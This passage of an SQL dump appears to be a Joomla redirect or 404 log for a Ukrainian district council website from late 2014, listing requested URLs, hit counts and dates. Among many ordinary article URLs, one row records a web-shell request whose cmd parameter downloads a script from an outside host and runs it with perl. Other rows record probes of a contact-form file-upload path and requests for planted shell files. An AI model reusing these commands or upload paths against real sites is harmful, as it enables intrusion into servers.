00:00:00',301),(9204,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1333:2014-06-05-13-09-03&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-29 13:26:36','0000-00-00 00:00:00',301),(9205,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-10-29 13:54:56','0000-00-00 00:00:00',301),(9206,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1188:2014-01-28-09-45-21&lang=ru&option=com_content&view=article','','http://go.mail.ru/search?q=%D0%97%D0%B0%20%D1%81%D1%83%D0%BC%D0%BB%D1%96%D0%BD%D0%BD%D0%B5%20%D0%B2%D0%B8%D0%BA%D0%BE%D0%BD%D0%B0%D0%BD%D0%BD%D1%8F%20','',4,0,'2014-10-29 13:56:58','0000-00-00 00:00:00',301),(9207,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=5&Itemid=6&lang=ru','','','',5,0,'2014-10-29 14:20:24','0000-00-00 00:00:00',301),(9208,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1164:2013-12-29-11-46-36&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-29 14:41:02','0000-00-00 00:00:00',301),(9209,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=976:2013-03-21-18-42-06&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-29 14:41:08','0000-00-00 00:00:00',301),(9210,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1248:2014-03-21-18-16-44&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-29 15:00:16','0000-00-00 00:00:00',301),(9211,'http://malyn-rayrada.org.ua/images/stories/0d4y.php','','','',2,0,'2014-10-29 15:15:05','0000-00-00 00:00:00',301),(9212,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1019:2013-06-06-11-26-38&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-29 16:13:56','0000-00-00 00:00:00',301),(9213,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=944:-l-r-&lang=uk&option=com_content&view=article','','','',6,0,'2014-10-29 16:14:25','0000-00-00 00:00:00',301),(9214,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1073:2013-08-30-11-12-19&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-29 16:34:56','0000-00-00 00:00:00',301),(9215,'http://www.malyn-rayrada.org.ua/images/stories/petx.php?cmd=wget http://visionafricamagazine.com/scripts/x.log;lwp-download http://visionafricamagazine.com/scripts/x.log;fetch http://visionafricamagazine.com/scripts/x.log;perl x.log;perl x.log;perl x.log;','','','',1,0,'2014-10-29 17:33:16','0000-00-00 00:00:00',301),(9216,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1182:2014-01-23-06-45-09&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-29 18:09:01','0000-00-00 00:00:00',301),(9217,'http://www.malyn-rayrada.org.ua/images/stories/0d4y.php','','','',4,0,'2014-10-29 18:17:15','0000-00-00 00:00:00',301),(9218,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1033:2013-06-18-12-58-36&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-29 19:20:50','0000-00-00 00:00:00',301),(9219,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=51:--19072013-&Itemid=92&lang=uk','','','',1,0,'2014-10-29 19:36:53','0000-00-00 00:00:00',301),(9220,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1005:-7-1943-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-29 21:17:31','0000-00-00 00:00:00',301),(9221,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=51:--19072013-&Itemid=92&lang=ru','','','',1,0,'2014-10-29 21:25:16','0000-00-00 00:00:00',301),(9222,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1339:2014-06-12-09-22-34&catid=59&Itemid=107&lang=en','','','',4,0,'2014-10-29 21:33:16','0000-00-00 00:00:00',301),(9223,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1014:2013-06-03-06-43-44&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-29 22:27:13','0000-00-00 00:00:00',301),(9224,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=944:-l-r-&lang=uk&option=com_content&view=article','','','',5,0,'2014-10-29 22:27:23','0000-00-00 00:00:00',301),(9225,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1241:2014-03-17-07-05-06&lang=uk&option=com_content&view=article','','','',5,0,'2014-10-29 22:27:25','0000-00-00 00:00:00',301),(9226,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1351:-2014-&catid=59&Itemid=107&lang=en','','','',5,0,'2014-10-29 22:34:12','0000-00-00 00:00:00',301),(9227,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1339:2014-06-12-09-22-34&catid=36&Itemid=70&lang=en','','','',1,0,'2014-10-29 22:45:26','0000-00-00 00:00:00',301),(9228,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1094:2013-09-24-05-02-52&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-30 00:25:34','0000-00-00 00:00:00',301),(9229,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&lang=uk','','','',4,0,'2014-10-30 00:37:54','0000-00-00 00:00:00',301),(9230,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=995:-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-30 00:54:45','0000-00-00 00:00:00',301),(9231,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1120:2013-10-25-12-32-17&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-30 01:33:23','0000-00-00 00:00:00',301),(9232,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-10-30 01:57:29','0000-00-00 00:00:00',301),(9233,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1004:2013-05-04-11-41-00&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-10-30 01:57:35','0000-00-00 00:00:00',301),(9234,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1218:2014-02-21-15-02-18&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-30 03:06:12','0000-00-00 00:00:00',301),(9235,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=991:2013-04-22-08-24-54&lang=ru&option=com_content&view=article','','','',5,0,'2014-10-30 03:34:05','0000-00-00 00:00:00',301),(9236,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1226:-1996-2004-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-30 05:07:51','0000-00-00 00:00:00',301),(9237,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1070:2013-08-23-04-27-00&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-30 05:07:53','0000-00-00 00:00:00',301),(9238,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1073:2013-08-30-11-12-19&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-30 06:12:39','0000-00-00 00:00:00',301),(9239,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=905:-2012-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-30 06:12:45','0000-00-00 00:00:00',301),(9240,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=915:-14-2012-340-l-2012-2013-&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-30 06:12:48','0000-00-00 00:00:00',301),(9241,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1210:2014-02-03-13-20-51&lang=uk&option=com_content&view=article','','','',6,0,'2014-10-30 06:12:55','0000-00-00 00:00:00',301),(9242,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-10-30 07:32:59','0000-00-00 00:00:00',301),(9243,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-10-30 07:59:04','0000-00-00 00:00:00',301),(9244,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1248:2014-03-21-18-16-44&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-30 08:15:41','0000-00-00 00:00:00',301),(9245,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1011:2013-05-29-09-51-28&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-30 08:15:43','0000-00-00 00:00:00',301),(9246,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=1296:116---&lang=en&option=com_content&view=article','','','',4,0,'2014-10-30 08:16:04','0000-00-00 00:00:00',301),(9247,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-10-30 08:55:11','0000-00-00 00:00:00',301),(9248,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-10-30 09:44:16','0000-00-00 00:00:00',301),(9249,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1322:-2012-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-30 09:49:46','0000-00-00 00:00:00',301),(9250,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1010:-22-6-&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-30 09:49:59','0000-00-00 00:00:00',301),(9251,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1247:2014-03-20-14-37-15&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-30 11:23:48','0000-00-00 00:00:00',301),(9252,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11&lang=ru','','','',3,0,'2014-10-30 15:10:27','0000-00-00 00:00:00',301),(9253,'http://www.malyn-rayrada.org.ua/joomla16/index.php','','','',1,0,'2014-10-30 17:03:41','0000-00-00 00:00:00',301),(9254,'http://www.malyn-rayrada.org.ua/joomla16/components/com_creativecontactform/fileupload/index.php','','','',1,0,'2014-10-30 17:03:48','0000-00-00 00:00:00',301),(9255,'http://www.malyn-rayrada.org.ua/joomla16/components/com_creativecontactform/fileupload/files/rr.php','','','',1,0,'2014-10-30 17:03:54','0000-00-00 00:00:00',301),(9256,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1265:2014-04-01-11-43-46&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-30 17:07:25','0000-00-00 00:00:00',301),(9257,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1326:-100-547&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-30 17:40:17','0000-00-00 00:00:00',301),(9258,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1050:2013-07-15-13-52-21&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-30 18:41:30','0000-00-00 00:00:00',301),(9259,'http://malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1348:2014-06-20-13-13-51&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-30 19:14:45','0000-00-00 00:00:00',301),(9260,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1325:2014-05-29-06-00-31&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-30 20:48:45','0000-00-00 00:00:00',301),(9261,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1058:-2013-&catid=51:--19072013-&Itemid=92&lang=ru','','','',5,0,'2014-10-30 21:09:56','0000-00-00 00:00:00',301),(9262,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1355:2014-07-02-06-11-04&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-30 22:22:41','0000-00-00 00:00:00',301),(9263,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1042:-qq-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-31 01:32:03','0000-00-00 00:00:00',301),(9264,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1018:2013-06-06-11-22-34&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-31 01:32:14','0000-00-00 00:00:00',301),(9265,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1370:31-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-31 01:32:16','0000-00-00 00:00:00',301),(9266,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1190:------------2014--&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-31 03:05:01','0000-00-00 00:00:00',301),(9267,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1041:2013-07-02-13-55-38&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-31 03:46:18','0000-00-00 00:00:00',301),(9268,'http://www.malyn-rayrada.org.ua/keskustelu/index.php','','','',2,0,'2014-10-31 05:18:11','0000-00-00 00:00:00',301),(9269,'http://www.malyn-rayrada.org.ua/keskustelu/components/com_creativecontactform/fileupload/index.php','','','',1,0,'2014-10-31 05:18:15','0000-00-00 00:00:00',301),(9270,'http://www.malyn-rayrada.org.ua/keskustelu/components/com_creativecontactform/fileupload/files/rr.php','','','',1,0,'2014-10-31 05:18:18','0000-00-00 00:00:00',301),(9271,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=940:2013-02-21-14-02-14&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-31 05:22:13','0000-00-00 00:00:00',301),(9272,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1359:2014-07-07-08-13-48&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-31 06:14:56','0000-00-00 00:00:00',301),(9273,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1066:-23-&lang=uk&option=com_content&view=article','','','',14,0,'2014-10-31 06:57:00','0000-00-00 00:00:00',301),(9274,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=ru','','','',3,0,'2014-10-31 07:31:34','0000-00-00 00:00:00',301),(9275,'http://www.malyn-rayrada.org.ua/images/stories/rapika.php?rf','','','',2,0,'2014-10-31 08:28:36','0000-00-00 00:00:00',301),(9276,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-10-31 08:29:21','0000-00-00 00:00:00',301),(9277,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1170:2014-01-08-11-02-06&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-31 09:23:58','0000-00-00 00:00:00',301),(9278,'http://malyn-rayrada.org.ua/components/com_creativecontactform/fileupload/index.php','','','',14,0,'2014-10-31 09:58:40','0000-00-00 00:00:00',301),(9279,'http://malyn-rayrada.org.ua/components/com_creativecontactform/fileupload/files/rr.php','','','',3,0,'2014-10-31 09:58:44','0000-00-00 00:00:00',301),(9280,'http://malyn-rayrada.org.ua/docs/index.php','','','',5,0,'2014-10-31 09:58:47','0000-00-00 00:00:00',301),(9281,'http://malyn-rayrada.org.ua/docs/components/com_creativecontactform/fileupload/index.php','','','',1,0,'2014-10-31 09:58:53','0000-00-00 00:00:00',301),(9282,'http://malyn-rayrada.org.ua/docs/components/com_creativecontactform/fileupload/files/rr.php','','','',1,0,'2014-10-31 09:58:56','0000-00-00 00:00:00',301),(9283,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-10-31 10:19:07','0000-00-00 00:00:00',301),(9284,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1321:-lr-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-31 10:20:14','0000-00-00 00:00:00',301),(9285,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1299:--------lr---&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-31 10:20:17','0000-00-00 00:00:00',301),(9286,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1061:2013-07-29-08-58-16&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-31 10:58:36','0000-00-00 00:00:00',301),(9287,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1200:2014-01-31-07-40-52&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-31 11:44:01','0000-00-00 00:00:00',301),(9288,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=983:2013-04-04-11-23-57&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-31 11:53:58','0000-00-00 00:00:00',301),(9289,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/353-pro-likvidaciju-ustinivskoi-zosh-i-st','',15,0,'2014-10-31 11:56:46','0000-00-00 00:00:00',301),(9290,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-------------2012-2015-&catid=36&Itemid=70&lang=en','','','',6,0,'2014-10-31 11:58:45','0000-00-00 00:00:00',301),(9291,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=36&Itemid=70&lang=en','','','',2,0,'2014-10-31 12:30:36','0000-00-00 00:00:00',301),(9292,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1062:2013-07-29-13-33-29&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-31 12:33:25','0000-00-00 00:00:00',301),(9293,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1170:2014-01-08-11-02-06&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-31 12:33:27','0000-00-00 00:00:00',301),(9294,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=948:-2012-&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-31 13:18:37','0000-00-00 00:00:00',301),(9295,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:------------2014-&catid=36&Itemid=70&lang=ru','','','',5,0,'2014-10-31 13:22:40','0000-00-00 00:00:00',301),(9296,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1155:2013-12-07-15-56-12&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-31 14:07:57','0000-00-00 00:00:00',301),(9297,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1256:2014-03-27-17-22-43&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-31 15:01:42','0000-00-00 00:00:00',301),(9298,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1277:-2014-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-31 16:29:11','0000-00-00 00:00:00',301),(9299,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1007:-4-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-31 16:35:59','0000-00-00 00:00:00',301),(9300,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1354:-lr-&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-31 17:17:21','0000-00-00 00:00:00',301),(9301,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1299:--------lr---&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-31 18:52:13','0000-00-00 00:00:00',301),(9302,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&lang=ru','','','',5,0,'2014-10-31 19:18:02','0000-00-00 00:00:00',301),(9303,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1358:2014-07-07-08-11-22&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-31 19:43:32','0000-00-00 00:00:00',301),(9304,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=974:2013-03-20-09-31-37&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-31 20:26:31','0000-00-00 00:00:00',301),(9305,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1227:2014-02-25-07-36-58&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-31 20:26:33','0000-00-00 00:00:00',301),(9306,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1059:2013-07-24-05-42-15&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-31 22:02:24','0000-00-00 00:00:00',301),(9307,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=en','','','',2,0,'2014-10-31 23:53:46','0000-00-00 00:00:00',301),(9308,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=950:2013-03-06-13-10-57&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-01 00:25:30','0000-00-00 00:00:00',301),(9309,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1257:2014-03-29-18-03-31&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-01 02:44:08','0000-00-00 00:00:00',301),(9310,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1084:-qq&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-01 02:44:15','0000-00-00 00:00:00',301),(9311,'http://www.malyn-rayrada.org.ua/images/stories/wawalo.php.pHp?baca','','','',1,0,'2014-11-01 03:00:03','0000-00-00 00:00:00',301),(9312,'http://www.malyn-rayrada.org.ua/images/stories/magic.php.pHp?baca','','','',1,0,'2014-11-01 03:00:16','0000-00-00 00:00:00',301),(9313,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1162:2013-12-19-06-13-29&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-01 03:32:55','0000-00-00 00:00:00',301),(9314,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=15&id=1163:2013-12-20-07-44-35&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-01 03:36:48','0000-00-00 00:00:00',301),(9315,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=en','','','',5,0,'2014-11-01 03:48:15','0000-00-00 00:00:00',301),(9316,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1184:----27----6-&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-01 04:19:08','0000-00-00 00:00:00',301),(9317,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1187:2014-01-28-09-43-51&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-01 04:19:10','0000-00-00 00:00:00',301),(9318,'http://malyn-rayrada.org.ua/index.php?Itemid=8&id=4:2010-06-05-12-51-18&lang=uk&layout=blog&option=com_content&view=category','','','',5,0,'2014-11-01 05:07:05','0000-00-00 00:00:00',301),(9319,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=en','','','',4,0,'2014-11-01 05:27:24','0000-00-00 00:00:00',301),(9320,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=964:----------------------2013-2017-&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-01 05:53:51','0000-00-00 00:00:00',301),(9321,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1189:2014-01-28-09-46-45&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-01 05:53:53','0000-00-00 00:00:00',301),(9322,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-11-01 06:30:03','0000-00-00 00:00:00',301),(9323,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=uk','','','',3,0,'2014-11-01 07:08:30','0000-00-00 00:00:00',301),(9324,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=970:-90-&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-01 07:28:08','0000-00-00 00:00:00',301),(9325,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=948:--------------2012-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-01 07:28:16','0000-00-00 00:00:00',301),(9326,'http://malyn-rayrada.org.ua/index.php/media/system/images/mootree_loader.gif','','','',23,0,'2014-11-01 07:54:49','0000-00-00 00:00:00',301),(9327,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=985:2013-04-12-09-53-08&catid=49&Itemid=88&lang=en','','','',3,0,'2014-11-01 08:15:45','0000-00-00 00:00:00',301),(9328,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1328:2014-06-01-11-58-56&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-01 08:22:57','0000-00-00 00:00:00',301),(9329,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=51:--19072013-&Itemid=92&lang=uk','','','',4,0,'2014-11-01 08:35:44','0000-00-00 00:00:00',301),(9330,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-11-01 08:51:43','0000-00-00 00:00:00',301),(9331,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1272:2014-04-09-05-15-36&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-01 09:02:49','0000-00-00 00:00:00',301),(9332,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1050:2013-07-15-13-52-21&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-01 09:02:58','0000-00-00 00:00:00',301),(9333,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=968:-2012-&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-11-01 09:17:34','0000-00-00 00:00:00',301),(9334,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-01 09:34:22','0000-00-00 00:00:00',301),(9335,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=51&Itemid=92&lang=ru','','','',25,0,'2014-11-01 09:49:44','0000-00-00 00:00:00',301),(9336,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-01 10:02:47','0000-00-00 00:00:00',301),(9337,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-01 10:03:27','0000-00-00 00:00:00',301),(9338,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-01 10:06:00','0000-00-00 00:00:00',301),(9339,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:--24--6-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-01 10:21:11','0000-00-00 00:00:00',301),(9340,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-01 10:21:20','0000-00-00 00:00:00',301),(9341,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:--24--6-&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-11-01 10:36:52','0000-00-00 00:00:00',301),(9342,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1205:2014-01-31-07-53-03&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-01 10:37:25','0000-00-00 